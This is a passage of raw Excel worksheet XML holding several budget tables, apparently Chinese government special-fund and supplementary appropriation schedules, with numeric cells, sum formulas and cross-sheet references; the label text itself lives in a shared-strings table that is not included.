      <c r="H24" s="3">
        <f t="shared" si="4"/>
        <v>195200</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="18" customHeight="1">
      <c r="A25" s="21"/>
      <c r="B25" s="21"/>
      <c r="C25" s="21"/>
      <c r="D25" s="21"/>
      <c r="E25" s="22" t="s">
        <v>395</v>
      </c>
      <c r="F25" s="17">
        <f>B26-F6-F23-F24</f>
        <v>0</v>
      </c>
      <c r="G25" s="18"/>
      <c r="H25" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="18" customHeight="1">
      <c r="A26" s="23" t="s">
        <v>152</v>
      </c>
      <c r="B26" s="24">
        <f>B6+B18+B19+B20</f>
        <v>128580</v>
      </c>
      <c r="C26" s="24">
        <f>C6+C18+C19+C20</f>
        <v>120000</v>
      </c>
      <c r="D26" s="24">
        <f>D6+D18+D19+D20</f>
        <v>248580</v>
      </c>
      <c r="E26" s="25" t="s">
        <v>124</v>
      </c>
      <c r="F26" s="24">
        <f t="shared" ref="F26" si="5">F6+F23+F24+F25</f>
        <v>128580</v>
      </c>
      <c r="G26" s="24">
        <f>G6+G23+G24+G25</f>
        <v>120000</v>
      </c>
      <c r="H26" s="24">
        <f>H6+H23+H24+H25</f>
        <v>248580</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A4:D4"/>
    <mergeCell ref="E4:H4"/>
  </mergeCells>
  <phoneticPr fontId="10"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oddFooter>&amp;C11</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet6.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="4"/>
  </sheetPr>
  <dimension ref="A1:D28"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <selection activeCell="C7" sqref="C7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.75" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="35.375" customWidth="1"/>
    <col min="2" max="2" width="14.25" customWidth="1"/>
    <col min="3" max="3" width="12.875" style="47" customWidth="1"/>
    <col min="4" max="4" width="13.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="20.25">
      <c r="A1" s="63" t="s">
        <v>645</v>
      </c>
      <c r="B1" s="63"/>
      <c r="C1" s="63"/>
      <c r="D1" s="63"/>
    </row>
    <row r="2" spans="1:4" ht="25.5" customHeight="1">
      <c r="D2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:4" ht="21" customHeight="1">
      <c r="A3" s="18" t="s">
        <v>646</v>
      </c>
      <c r="B3" s="18" t="s">
        <v>174</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>175</v>
      </c>
      <c r="D3" s="18" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="21" customHeight="1">
      <c r="A4" s="18" t="s">
        <v>647</v>
      </c>
      <c r="B4" s="18"/>
      <c r="C4" s="3">
        <f>C5+C13+C14</f>
        <v>167198.896083</v>
      </c>
      <c r="D4" s="18"/>
    </row>
    <row r="5" spans="1:4" ht="21" customHeight="1">
      <c r="A5" s="18" t="s">
        <v>648</v>
      </c>
      <c r="B5" s="18"/>
      <c r="C5" s="3">
        <f>SUM(C6:C12)</f>
        <v>31900</v>
      </c>
      <c r="D5" s="18" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="6" spans="1:4" ht="21" customHeight="1">
      <c r="A6" s="18" t="s">
        <v>650</v>
      </c>
      <c r="B6" s="18" t="s">
        <v>651</v>
      </c>
      <c r="C6" s="3">
        <f>2400-630</f>
        <v>1770</v>
      </c>
      <c r="D6" s="18"/>
    </row>
    <row r="7" spans="1:4" ht="21" customHeight="1">
      <c r="A7" s="18" t="s">
        <v>652</v>
      </c>
      <c r="B7" s="18" t="s">
        <v>653</v>
      </c>
      <c r="C7" s="3">
        <v>5000</v>
      </c>
      <c r="D7" s="18"/>
    </row>
    <row r="8" spans="1:4" ht="21" customHeight="1">
      <c r="A8" s="18" t="s">
        <v>654</v>
      </c>
      <c r="B8" s="18" t="s">
        <v>655</v>
      </c>
      <c r="C8" s="3">
        <v>8630</v>
      </c>
      <c r="D8" s="18"/>
    </row>
    <row r="9" spans="1:4" ht="21" customHeight="1">
      <c r="A9" s="18" t="s">
        <v>656</v>
      </c>
      <c r="B9" s="18" t="s">
        <v>657</v>
      </c>
      <c r="C9" s="3">
        <v>4200</v>
      </c>
      <c r="D9" s="18"/>
    </row>
    <row r="10" spans="1:4" ht="21" customHeight="1">
      <c r="A10" s="18" t="s">
        <v>658</v>
      </c>
      <c r="B10" s="18" t="s">
        <v>657</v>
      </c>
      <c r="C10" s="3">
        <v>2800</v>
      </c>
      <c r="D10" s="18"/>
    </row>
    <row r="11" spans="1:4" ht="21" customHeight="1">
      <c r="A11" s="18" t="s">
        <v>659</v>
      </c>
      <c r="B11" s="18" t="s">
        <v>660</v>
      </c>
      <c r="C11" s="3">
        <v>1500</v>
      </c>
      <c r="D11" s="18"/>
    </row>
    <row r="12" spans="1:4" ht="21" customHeight="1">
      <c r="A12" s="18" t="s">
        <v>661</v>
      </c>
      <c r="B12" s="18" t="s">
        <v>662</v>
      </c>
      <c r="C12" s="3">
        <v>8000</v>
      </c>
      <c r="D12" s="18"/>
    </row>
    <row r="13" spans="1:4" ht="21" customHeight="1">
      <c r="A13" s="52" t="s">
        <v>794</v>
      </c>
      <c r="B13" s="18"/>
      <c r="C13" s="3">
        <v>34756.123459000002</v>
      </c>
      <c r="D13" s="18" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="14" spans="1:4" ht="21" customHeight="1">
      <c r="A14" s="18" t="s">
        <v>664</v>
      </c>
      <c r="B14" s="18"/>
      <c r="C14" s="3">
        <f>SUM(C15:C28)</f>
        <v>100542.772624</v>
      </c>
      <c r="D14" s="18" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="15" spans="1:4" ht="21" customHeight="1">
      <c r="A15" s="18" t="s">
        <v>666</v>
      </c>
      <c r="B15" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C15" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D6</f>
        <v>12205.667100000001</v>
      </c>
      <c r="D15" s="18"/>
    </row>
    <row r="16" spans="1:4" ht="21" customHeight="1">
      <c r="A16" s="18" t="s">
        <v>667</v>
      </c>
      <c r="B16" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C16" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D55</f>
        <v>2336.7964999999999</v>
      </c>
      <c r="D16" s="18"/>
    </row>
    <row r="17" spans="1:4" ht="21" customHeight="1">
      <c r="A17" s="18" t="s">
        <v>668</v>
      </c>
      <c r="B17" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C17" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D64</f>
        <v>10374.912</v>
      </c>
      <c r="D17" s="18"/>
    </row>
    <row r="18" spans="1:4" ht="21" customHeight="1">
      <c r="A18" s="18" t="s">
        <v>669</v>
      </c>
      <c r="B18" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C18" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D70</f>
        <v>696.13199999999995</v>
      </c>
      <c r="D18" s="18"/>
    </row>
    <row r="19" spans="1:4" ht="21" customHeight="1">
      <c r="A19" s="18" t="s">
        <v>670</v>
      </c>
      <c r="B19" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C19" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D80</f>
        <v>3625.7224000000001</v>
      </c>
      <c r="D19" s="18"/>
    </row>
    <row r="20" spans="1:4" ht="21" customHeight="1">
      <c r="A20" s="18" t="s">
        <v>671</v>
      </c>
      <c r="B20" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C20" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D85</f>
        <v>3376.03</v>
      </c>
      <c r="D20" s="18"/>
    </row>
    <row r="21" spans="1:4" ht="21" customHeight="1">
      <c r="A21" s="18" t="s">
        <v>672</v>
      </c>
      <c r="B21" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C21" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D91</f>
        <v>9761.86</v>
      </c>
      <c r="D21" s="18"/>
    </row>
    <row r="22" spans="1:4" ht="21" customHeight="1">
      <c r="A22" s="18" t="s">
        <v>673</v>
      </c>
      <c r="B22" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C22" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D98</f>
        <v>22733.112799999999</v>
      </c>
      <c r="D22" s="18"/>
    </row>
    <row r="23" spans="1:4" ht="21" customHeight="1">
      <c r="A23" s="18" t="s">
        <v>674</v>
      </c>
      <c r="B23" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C23" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D111</f>
        <v>2413.3000000000002</v>
      </c>
      <c r="D23" s="18"/>
    </row>
    <row r="24" spans="1:4" ht="21" customHeight="1">
      <c r="A24" s="18" t="s">
        <v>675</v>
      </c>
      <c r="B24" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C24" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D120</f>
        <v>8356.9470000000001</v>
      </c>
      <c r="D24" s="18"/>
    </row>
    <row r="25" spans="1:4" ht="21" customHeight="1">
      <c r="A25" s="18" t="s">
        <v>676</v>
      </c>
      <c r="B25" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C25" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D141</f>
        <v>2508.5473000000002</v>
      </c>
      <c r="D25" s="18"/>
    </row>
    <row r="26" spans="1:4" ht="21" customHeight="1">
      <c r="A26" s="18" t="s">
        <v>677</v>
      </c>
      <c r="B26" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C26" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D148</f>
        <v>14485.103800000001</v>
      </c>
      <c r="D26" s="18"/>
    </row>
    <row r="27" spans="1:4" ht="21" customHeight="1">
      <c r="A27" s="18" t="s">
        <v>678</v>
      </c>
      <c r="B27" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C27" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D167</f>
        <v>328</v>
      </c>
      <c r="D27" s="18"/>
    </row>
    <row r="28" spans="1:4" ht="21" customHeight="1">
      <c r="A28" s="18" t="s">
        <v>679</v>
      </c>
      <c r="B28" s="18" t="s">
        <v>230</v>
      </c>
      <c r="C28" s="3">
        <f>'专项资金追加预算安排表（附表3）'!D170</f>
        <v>7340.6417240000001</v>
      </c>
      <c r="D28" s="18"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.97916666666666696" bottom="0.78888888888888897" header="0.50902777777777797" footer="0.50902777777777797"/>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E18"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F25" sqref="F25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.75" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="29.75" customWidth="1"/>
    <col min="2" max="2" width="28" customWidth="1"/>
    <col min="3" max="3" width="12.25" customWidth="1"/>
    <col min="4" max="4" width="14" customWidth="1"/>
    <col min="5" max="5" width="23.5" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5">
      <c r="A1" s="2" t="s">
        <v>680</v>
      </c>
    </row>
    <row r="2" spans="1:5" ht="20.25">
      <c r="A2" s="63" t="s">
        <v>681</v>
      </c>
      <c r="B2" s="63"/>
      <c r="C2" s="63"/>
      <c r="D2" s="63"/>
      <c r="E2" s="63"/>
    </row>
    <row r="3" spans="1:5">
      <c r="D3" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="22.5" customHeight="1">
      <c r="A4" s="18" t="s">
        <v>682</v>
      </c>
      <c r="B4" s="18" t="s">
        <v>683</v>
      </c>
      <c r="C4" s="18" t="s">
        <v>684</v>
      </c>
      <c r="D4" s="18" t="s">
        <v>685</v>
      </c>
      <c r="E4" s="18" t="s">
        <v>686</v>
      </c>
    </row>
    <row r="5" spans="1:5" ht="22.5" customHeight="1">
      <c r="A5" s="18" t="s">
        <v>687</v>
      </c>
      <c r="B5" s="18"/>
      <c r="C5" s="18"/>
      <c r="D5" s="18">
        <f>D6+D8+D10+D12+D15+D17</f>
        <v>31900</v>
      </c>
      <c r="E5" s="18"/>
    </row>
    <row r="6" spans="1:5" ht="22.5" customHeight="1">
      <c r="A6" s="18" t="s">
        <v>688</v>
      </c>
      <c r="B6" s="18"/>
      <c r="C6" s="18"/>
      <c r="D6" s="18">
        <f>SUM(D7)</f>
        <v>1770</v>
      </c>
      <c r="E6" s="18"/>
    </row>
    <row r="7" spans="1:5" ht="22.5" customHeight="1">
      <c r="A7" s="18"/>
      <c r="B7" s="18" t="s">
        <v>689</v>
      </c>
      <c r="C7" s="18" t="s">
        <v>651</v>
      </c>
      <c r="D7" s="18">
        <f>2400-630</f>
        <v>1770</v>
      </c>
      <c r="E7" s="18"/>
    </row>
    <row r="8" spans="1:5" ht="22.5" customHeight="1">
      <c r="A8" s="18" t="s">
        <v>690</v>
      </c>
      <c r="B8" s="18"/>
      <c r="C8" s="18"/>
      <c r="D8" s="18">
        <f>SUM(D9:D9)</f>
        <v>5000</v>
      </c>
      <c r="E8" s="18"/>
    </row>
    <row r="9" spans="1:5" ht="22.5" customHeight="1">
      <c r="A9" s="18"/>
      <c r="B9" s="18" t="s">
        <v>691</v>
      </c>
      <c r="C9" s="18" t="s">
        <v>653</v>
      </c>
      <c r="D9" s="18">
        <v>5000</v>
      </c>
      <c r="E9" s="18"/>
    </row>
    <row r="10" spans="1:5" ht="22.5" customHeight="1">
      <c r="A10" s="18" t="s">
        <v>692</v>
      </c>
      <c r="B10" s="18"/>
      <c r="C10" s="18"/>
      <c r="D10" s="18">
        <f>SUM(D11)</f>
        <v>8630</v>
      </c>
      <c r="E10" s="18"/>
    </row>
    <row r="11" spans="1:5" ht="22.5" customHeight="1">
      <c r="A11" s="18"/>
      <c r="B11" s="18" t="s">
        <v>693</v>
      </c>
      <c r="C11" s="18" t="s">
        <v>655</v>
      </c>
      <c r="D11" s="18">
        <v>8630</v>
      </c>
      <c r="E11" s="18"/>
    </row>
    <row r="12" spans="1:5" ht="22.5" customHeight="1">
      <c r="A12" s="18" t="s">
        <v>694</v>
      </c>
      <c r="B12" s="18"/>
      <c r="C12" s="18"/>
      <c r="D12" s="18">
        <f>SUM(D13:D14)</f>
        <v>7000</v>
      </c>
      <c r="E12" s="18"/>
    </row>
    <row r="13" spans="1:5" ht="22.5" customHeight="1">
      <c r="A13" s="18"/>
      <c r="B13" s="18" t="s">
        <v>695</v>
      </c>
      <c r="C13" s="18" t="s">
        <v>657</v>
      </c>
      <c r="D13" s="18">
        <v>4200</v>
      </c>
      <c r="E13" s="18" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="14" spans="1:5" ht="22.5" customHeight="1">
      <c r="A14" s="18"/>
      <c r="B14" s="18" t="s">
        <v>697</v>
      </c>
      <c r="C14" s="18" t="s">
        <v>657</v>
      </c>
      <c r="D14" s="18">
        <v>2800</v>
      </c>
      <c r="E14" s="18" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="15" spans="1:5" ht="22.5" customHeight="1">
      <c r="A15" s="18" t="s">
        <v>698</v>
      </c>
      <c r="B15" s="18"/>
      <c r="C15" s="18"/>
      <c r="D15" s="18">
        <f>SUM(D16)</f>
        <v>1500</v>
      </c>
      <c r="E15" s="18"/>
    </row>
    <row r="16" spans="1:5" ht="22.5" customHeight="1">
      <c r="A16" s="18"/>
      <c r="B16" s="18" t="s">
        <v>699</v>
      </c>
      <c r="C16" s="18" t="s">
        <v>660</v>
      </c>
      <c r="D16" s="18">
        <v>1500</v>
      </c>
      <c r="E16" s="18" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="17" spans="1:5" ht="22.5" customHeight="1">
      <c r="A17" s="18" t="s">
        <v>700</v>
      </c>
      <c r="B17" s="18"/>
      <c r="C17" s="18"/>
      <c r="D17" s="18">
        <f>SUM(D18)</f>
        <v>8000</v>
      </c>
      <c r="E17" s="18"/>
    </row>
    <row r="18" spans="1:5" ht="22.5" customHeight="1">
      <c r="A18" s="18"/>
      <c r="B18" s="18" t="s">
        <v>701</v>
      </c>
      <c r="C18" s="18" t="s">
        <v>662</v>
      </c>
      <c r="D18" s="18">
        <v>8000</v>
      </c>
      <c r="E18" s="18"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:E2"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.74791666666666701" right="0.74791666666666701" top="0.98402777777777795" bottom="0.98402777777777795" header="0.51041666666666696" footer="0.51041666666666696"/>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C80"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <selection activeCell="G25" sqref="G25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7" defaultRowHeight="18.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="41.5" customWidth="1"/>
    <col min="2" max="2" width="19.125" style="48" customWidth="1"/>
    <col min="3" max="3" width="12.625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="24" customHeight="1">
      <c r="A1" s="2" t="s">
        <v>793</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="18.75" customHeight="1">
      <c r="A2" s="63" t="s">
        <v>702</v>
      </c>
      <c r="B2" s="63"/>
      <c r="C2" s="63"/>
    </row>
    <row r="3" spans="1:3" ht="18.75" customHeight="1">
      <c r="C3" s="50" t="s">
        <v>792</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="32.25" customHeight="1">
      <c r="A4" s="18" t="s">
        <v>174</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>703</v>
      </c>
      <c r="C4" s="18" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="18.75" customHeight="1">
      <c r="A5" s="18" t="s">
        <v>704</v>
      </c>
      <c r="B5" s="3">
        <f>SUM(B6:B80)</f>
        <v>34756.123458999995</v>
      </c>
      <c r="C5" s="18"/>
    </row>
    <row r="6" spans="1:3" ht="18.75" customHeight="1">
      <c r="A6" s="18" t="s">
        <v>705</v>
      </c>
      <c r="B6" s="3">
        <v>58.376260000000002</v>
      </c>
      <c r="C6" s="18"/>
    </row>
    <row r="7" spans="1:3" ht="18.75" customHeight="1">
      <c r="A7" s="18" t="s">
        <v>706</v>
      </c>
      <c r="B7" s="3">
        <v>39.31738</v>
      </c>
      <c r="C7" s="18"/>
    </row>
    <row r="8" spans="1:3" ht="18.75" customHeight="1">
      <c r="A8" s="18" t="s">
        <v>707</v>
      </c>
      <c r="B8" s="3">
        <v>7.5289999999999999</v>
      </c>
      <c r="C8" s="18"/>
    </row>
    <row r="9" spans="1:3" ht="18.75" customHeight="1">
      <c r="A9" s="18" t="s">
        <v>708</v>
      </c>
      <c r="B9" s="3">
        <v>14.295999999999999</v>
      </c>
      <c r="C9" s="18"/>
    </row>
    <row r="10" spans="1:3" ht="18.75" customHeight="1">
      <c r="A10" s="18" t="s">
        <v>709</v>
      </c>
      <c r="B10" s="3">
        <v>21.7</v>
      </c>
      <c r="C10" s="18"/>
    </row>
    <row r="11" spans="1:3" ht="18.75" customHeight="1">
      <c r="A11" s="18" t="s">
        <v>710</v>
      </c>
      <c r="B11" s="3">
        <v>19.990200000000002</v>
      </c>
      <c r="C11" s="18"/>
    </row>
    <row r="12" spans="1:3" ht="18.75" customHeight="1">
      <c r="A12" s="18" t="s">
        <v>711</v>
      </c>
      <c r="B12" s="3">
        <v>345.06700000000001</v>
      </c>
      <c r="C12" s="18"/>
    </row>
    <row r="13" spans="1:3" ht="18.75" customHeight="1">
      <c r="A13" s="18" t="s">
        <v>712</v>
      </c>
      <c r="B13" s="3">
        <v>13.031499999999999</v>
      </c>
      <c r="C13" s="18"/>
    </row>
    <row r="14" spans="1:3" ht="18.75" customHeight="1">
      <c r="A14" s="18" t="s">
        <v>713</v>
      </c>
      <c r="B14" s="3">
        <v>35.645580000000002</v>
      </c>
      <c r="C14" s="18"/>
    </row>
    <row r="15" spans="1:3" ht="18.75" customHeight="1">
      <c r="A15" s="18" t="s">
        <v>714</v>
      </c>
      <c r="B15" s="3">
        <v>18.346499999999999</v>
      </c>
      <c r="C15" s="18"/>
    </row>
    <row r="16" spans="1:3" ht="18.75" customHeight="1">
      <c r="A16" s="18" t="s">
        <v>715</v>
      </c>
      <c r="B16" s="3">
        <v>0.68400000000000005</v>
      </c>
      <c r="C16" s="18"/>
    </row>
    <row r="17" spans="1:3" ht="18.75" customHeight="1">
      <c r="A17" s="18" t="s">
        <v>716</v>
      </c>
      <c r="B17" s="3">
        <v>2.004</v>
      </c>
      <c r="C17" s="18"/>
    </row>
    <row r="18" spans="1:3" ht="18.75" customHeight="1">
      <c r="A18" s="18" t="s">
        <v>717</v>
      </c>
      <c r="B18" s="3">
        <v>173.244</v>
      </c>
      <c r="C18" s="18"/>
    </row>
    <row r="19" spans="1:3" ht="18.75" customHeight="1">
      <c r="A19" s="18" t="s">
        <v>718</v>
      </c>
      <c r="B19" s="3">
        <v>49.42</v>
      </c>
      <c r="C19" s="18"/>
    </row>
    <row r="20" spans="1:3" ht="18.75" customHeight="1">
      <c r="A20" s="18" t="s">
        <v>719</v>
      </c>
      <c r="B20" s="3">
        <v>17.8</v>
      </c>
      <c r="C20" s="18"/>
    </row>
    <row r="21" spans="1:3" ht="18.75" customHeight="1">
      <c r="A21" s="18" t="s">
        <v>720</v>
      </c>
      <c r="B21" s="3">
        <v>7.7446719999999996</v>
      </c>
      <c r="C21" s="18"/>
    </row>
    <row r="22" spans="1:3" ht="18.75" customHeight="1">
      <c r="A22" s="18" t="s">
        <v>721</v>
      </c>
      <c r="B22" s="3">
        <v>36.381399999999999</v>
      </c>
      <c r="C22" s="18"/>
    </row>
    <row r="23" spans="1:3" ht="18.75" customHeight="1">
      <c r="A23" s="18" t="s">
        <v>722</v>
      </c>
      <c r="B23" s="3">
        <v>343.298</v>
      </c>
      <c r="C23" s="18"/>
    </row>
    <row r="24" spans="1:3" ht="18.75" customHeight="1">
      <c r="A24" s="18" t="s">
        <v>723</v>
      </c>
      <c r="B24" s="3">
        <v>520.35484099999996</v>
      </c>
      <c r="C24" s="18"/>
    </row>
    <row r="25" spans="1:3" ht="18.75" customHeight="1">
      <c r="A25" s="18" t="s">
        <v>724</v>
      </c>
      <c r="B25" s="3">
        <v>250.06630000000001</v>
      </c>
      <c r="C25" s="18"/>
    </row>
    <row r="26" spans="1:3" ht="18.75" customHeight="1">
      <c r="A26" s="18" t="s">
        <v>725</v>
      </c>
      <c r="B26" s="3">
        <v>126.6562</v>
      </c>
      <c r="C26" s="18"/>
    </row>
    <row r="27" spans="1:3" ht="18.75" customHeight="1">
      <c r="A27" s="18" t="s">
        <v>726</v>
      </c>
      <c r="B27" s="3">
        <v>119</v>
      </c>
      <c r="C27" s="18"/>
    </row>
    <row r="28" spans="1:3" ht="18.75" customHeight="1">
      <c r="A28" s="18" t="s">
        <v>727</v>
      </c>
      <c r="B28" s="3">
        <v>2731.0751810000002</v>
      </c>
      <c r="C28" s="18"/>
    </row>
    <row r="29" spans="1:3" ht="18.75" customHeight="1">
      <c r="A29" s="18" t="s">
        <v>728</v>
      </c>
      <c r="B29" s="3">
        <v>145.779257</v>
      </c>
      <c r="C29" s="18"/>
    </row>
    <row r="30" spans="1:3" ht="18.75" customHeight="1">
      <c r="A30" s="18" t="s">
        <v>729</v>
      </c>
      <c r="B30" s="3">
        <v>69.83</v>
      </c>
      <c r="C30" s="18"/>
    </row>
    <row r="31" spans="1:3" ht="18.75" customHeight="1">
      <c r="A31" s="18" t="s">
        <v>730</v>
      </c>
      <c r="B31" s="3">
        <v>28.9</v>
      </c>
      <c r="C31" s="18"/>
    </row>
    <row r="32" spans="1:3" ht="18.75" customHeight="1">
      <c r="A32" s="18" t="s">
        <v>731</v>
      </c>
      <c r="B32" s="3">
        <v>3.0587</v>
      </c>
      <c r="C32" s="18"/>
    </row>
    <row r="33" spans="1:3" ht="18.75" customHeight="1">
      <c r="A33" s="18" t="s">
        <v>732</v>
      </c>
      <c r="B33" s="3">
        <v>80</v>
      </c>
      <c r="C33" s="18"/>
    </row>
    <row r="34" spans="1:3" ht="18.75" customHeight="1">
      <c r="A34" s="18" t="s">
        <v>733</v>
      </c>
      <c r="B34" s="3">
        <v>79.125573000000003</v>
      </c>
      <c r="C34" s="18"/>
    </row>
    <row r="35" spans="1:3" ht="18.75" customHeight="1">
      <c r="A35" s="18" t="s">
        <v>734</v>
      </c>
      <c r="B35" s="3">
        <v>31.624222</v>
      </c>
      <c r="C35" s="18"/>
    </row>
    <row r="36" spans="1:3" ht="18.75" customHeight="1">
      <c r="A36" s="18" t="s">
        <v>735</v>
      </c>
      <c r="B36" s="3">
        <v>15.918264000000001</v>
      </c>
      <c r="C36" s="18"/>
    </row>
    <row r="37" spans="1:3" ht="18.75" customHeight="1">
      <c r="A37" s="18" t="s">
        <v>736</v>
      </c>
      <c r="B37" s="3">
        <v>782.834926</v>
      </c>
      <c r="C37" s="18"/>
    </row>
    <row r="38" spans="1:3" ht="18.75" customHeight="1">
      <c r="A38" s="18" t="s">
        <v>737</v>
      </c>
      <c r="B38" s="3">
        <v>10.734</v>
      </c>
      <c r="C38" s="18"/>
    </row>
    <row r="39" spans="1:3" ht="18.75" customHeight="1">
      <c r="A39" s="18" t="s">
        <v>738</v>
      </c>
      <c r="B39" s="3">
        <v>25</v>
      </c>
      <c r="C39" s="18"/>
    </row>
    <row r="40" spans="1:3" ht="18.75" customHeight="1">
      <c r="A40" s="18" t="s">
        <v>739</v>
      </c>
      <c r="B40" s="3">
        <v>1.083</v>
      </c>
      <c r="C40" s="18"/>
    </row>
    <row r="41" spans="1:3" ht="18.75" customHeight="1">
      <c r="A41" s="18" t="s">
        <v>740</v>
      </c>
      <c r="B41" s="3">
        <v>8.0820000000000007</v>
      </c>
      <c r="C41" s="18"/>
    </row>
    <row r="42" spans="1:3" ht="18.75" customHeight="1">
      <c r="A42" s="18" t="s">
        <v>741</v>
      </c>
      <c r="B42" s="3">
        <v>4.758</v>
      </c>
      <c r="C42" s="18"/>
    </row>
    <row r="43" spans="1:3" ht="18.75" customHeight="1">
      <c r="A43" s="18" t="s">
        <v>742</v>
      </c>
      <c r="B43" s="3">
        <v>6.69</v>
      </c>
      <c r="C43" s="18"/>
    </row>
    <row r="44" spans="1:3" ht="18.75" customHeight="1">
      <c r="A44" s="18" t="s">
        <v>743</v>
      </c>
      <c r="B44" s="3">
        <v>5.5259999999999998</v>
      </c>
      <c r="C44" s="18"/>
    </row>
    <row r="45" spans="1:3" ht="18.75" customHeight="1">
      <c r="A45" s="18" t="s">
        <v>744</v>
      </c>
      <c r="B45" s="3">
        <v>11.76</v>
      </c>
      <c r="C45" s="18"/>
    </row>
    <row r="46" spans="1:3" ht="18.75" customHeight="1">
      <c r="A46" s="18" t="s">
        <v>745</v>
      </c>
      <c r="B46" s="3">
        <v>88.5</v>
      </c>
      <c r="C46" s="18"/>
    </row>
    <row r="47" spans="1:3" ht="18.75" customHeight="1">
      <c r="A47" s="18" t="s">
        <v>746</v>
      </c>
      <c r="B47" s="3">
        <v>1.68</v>
      </c>
      <c r="C47" s="18"/>
    </row>
    <row r="48" spans="1:3" ht="18.75" customHeight="1">
      <c r="A48" s="18" t="s">
        <v>747</v>
      </c>
      <c r="B48" s="3">
        <v>3.504</v>
      </c>
      <c r="C48" s="18"/>
    </row>
    <row r="49" spans="1:3" ht="18.75" customHeight="1">
      <c r="A49" s="18" t="s">
        <v>748</v>
      </c>
      <c r="B49" s="3">
        <v>4.4340000000000002</v>
      </c>
      <c r="C49" s="18"/>
    </row>
    <row r="50" spans="1:3" ht="18.75" customHeight="1">
      <c r="A50" s="18" t="s">
        <v>749</v>
      </c>
      <c r="B50" s="3">
        <v>81.432000000000002</v>
      </c>
      <c r="C50" s="18"/>
    </row>
    <row r="51" spans="1:3" ht="18.75" customHeight="1">
      <c r="A51" s="18" t="s">
        <v>750</v>
      </c>
      <c r="B51" s="3">
        <v>1.083</v>
      </c>
      <c r="C51" s="18"/>
    </row>
    <row r="52" spans="1:3" ht="18.75" customHeight="1">
      <c r="A52" s="18" t="s">
        <v>751</v>
      </c>
      <c r="B52" s="3">
        <v>51.552</v>
      </c>
      <c r="C52" s="18"/>
    </row>
    <row r="53" spans="1:3" ht="18.75" customHeight="1">
      <c r="A53" s="18" t="s">
        <v>752</v>
      </c>
      <c r="B53" s="3">
        <v>19.472000000000001</v>
      </c>
      <c r="C53" s="18"/>
    </row>
    <row r="54" spans="1:3" ht="18.75" customHeight="1">
      <c r="A54" s="18" t="s">
        <v>753</v>
      </c>
      <c r="B54" s="3">
        <v>71.304603</v>
      </c>
      <c r="C54" s="18"/>
    </row>
    <row r="55" spans="1:3" ht="18.75" customHeight="1">
      <c r="A55" s="18" t="s">
        <v>754</v>
      </c>
      <c r="B55" s="3">
        <v>82.36</v>
      </c>
      <c r="C55" s="18"/>
    </row>
